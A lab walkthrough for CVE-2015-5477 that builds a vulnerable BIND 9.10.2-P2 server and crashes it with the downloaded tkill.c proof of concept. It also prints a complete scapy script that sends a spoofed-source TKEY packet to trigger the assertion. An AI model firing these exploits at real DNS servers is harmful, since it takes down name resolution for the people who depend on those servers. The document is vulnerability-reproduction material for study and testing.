# CVE-2015-5477: BIND9 TKEY assert DoS


Server (build and run the vulnerable BIND 9.10.2-P2 here; the `#` prompts indicate a root shell, and this deliberately vulnerable daemon should only be reachable from an isolated lab network)

# wget -O bind-9-10-2-p2.tar.gz https://www.isc.org/downloads/file/bind-9-10-2-p2/?version=tar-gz
(Verify the tarball against ISC's published PGP signature or hash for this release before building: whatever this download returns is compiled and then run as root below.)
# tar xvzf bind-9-10-2-p2.tar.gz
# cd bind-9.10.2-P2
# ./configure --without-openssl
# make
# touch /etc/named.conf
# bin/named/named -g
(-g keeps named in the foreground logging to stderr, so if the PoC works the assertion failure and exit should show up on this console. The empty named.conf means compiled-in defaults for listening and access control -- fine for a lab box, not something to leave reachable.)

Client

# apt-get install fpdns
# fpdns server_ip
fingerprint (server_ip, server_ip): ISC BIND 9.2.3rc1 -- 9.6.1-P1 [recursion enabled]
(Note that fpdns's behavioural fingerprint is wrong here -- the server is actually 9.10.2-P2, as the version.bind query below shows -- so do not gate the exploit attempt on fpdns output alone.)
# dig @server_ip -c chaos -t txt version.bind +short
"9.10.2-P2"
(The CHAOS-class version.bind query answers here only because the empty named.conf leaves BIND's default; a hardened server sets `version` in `options` to hide or fake it, in which case the TKEY behaviour has to be tested blind.)
# wget https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
(This fetches whatever is on master at the time; read tkill.c before compiling and running it as root, and prefer pinning the URL to a specific commit so the PoC you ran is reproducible.)
# gcc -o tkill tkill.c
# ./tkill server_ip
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] server_ip: Resolving to IP address
[+] server_ip: Resolved to multiple IPs (NOTE)
[+] server_ip: Probing...
[+] Querying version...
[+] server_ip: "9.10.2-P2" 
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
(The PoC only infers the crash from the missing reply -- a dropped packet or a firewall would look the same. Confirm on the server side: the named -g console should show the assertion failure and the process should be gone.)
# cat cve-2015-5477.py
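from scapy.all import *
from sys import argv

# Source address to spoof.  192.0.2.1 is an RFC 5737 documentation address
# (TEST-NET-1), so any reply from the target goes nowhere useful: this is a
# fire-and-forget trigger, and the crash has to be confirmed on the server
# side (e.g. the console of a `named -g` run), not from this script.
spoofed = '192.0.2.1'

# Hand-assembled DNS message in wire format (RFC 1035 s4.1), ID 0:
#   header     : flags 0x0100 (RD), QDCOUNT 1, ANCOUNT 0, NSCOUNT 0, ARCOUNT 1
#   question   : foo.bar  TYPE 249 (TKEY)  CLASS 255 (ANY)
#   additional : foo.bar  TYPE 16 (TXT)    CLASS 255 (ANY)  TTL 0  RDLENGTH 7
#                RDATA "\x06foobar"
# i.e. a TKEY query whose additional section carries a non-TKEY record under
# the *same* owner name -- the shape ISC's advisory for CVE-2015-5477
# describes as tripping a REQUIRE assertion in named's TKEY handling, which
# makes named exit.
#
# This must be a bytes literal.  The original str literal works on Python 2
# (str is bytes there), but on Python 3 scapy's Raw() encodes a str payload
# as UTF-8, turning \xf9 and \xff into two bytes each and corrupting the
# TYPE/CLASS fields -- the packet would then no longer be a TKEY query at all.
dns_query = (
    b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01'   # header
    b'\x03foo\x03bar\x00\x00\xf9\x00\xff'                 # question
    b'\x03foo\x03bar\x00\x00\x10\x00\xff'                 # additional: name/type/class
    b'\x00\x00\x00\x00\x00\x07\x06foobar'                 # TTL / RDLENGTH / RDATA
)

if __name__ == '__main__':
    # Fail with a usage line on a missing argument instead of an IndexError
    # traceback from argv[1].
    if len(argv) != 2:
        raise SystemExit('usage: %s <target-ip-or-name>' % argv[0])
    target = argv[1]

    # Layer-3 send through a raw socket: needs root (or CAP_NET_RAW on
    # Linux), which the spoofed source address requires anyway.  No reply is
    # waited for -- none could arrive at this host.
    send(IP(src=spoofed, dst=target) / UDP(dport=53) / Raw(load=dns_query))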
# python cve-2015-5477.py server_ip
(Needs root: scapy's layer-3 send() goes through a raw socket, which the spoofed 192.0.2.1 source requires anyway. Because the source is spoofed, no reply ever reaches this host -- check the named console on the server to see whether it actually died.)

Reference

https://github.com/robertdavidgraham/cve-2015-5477
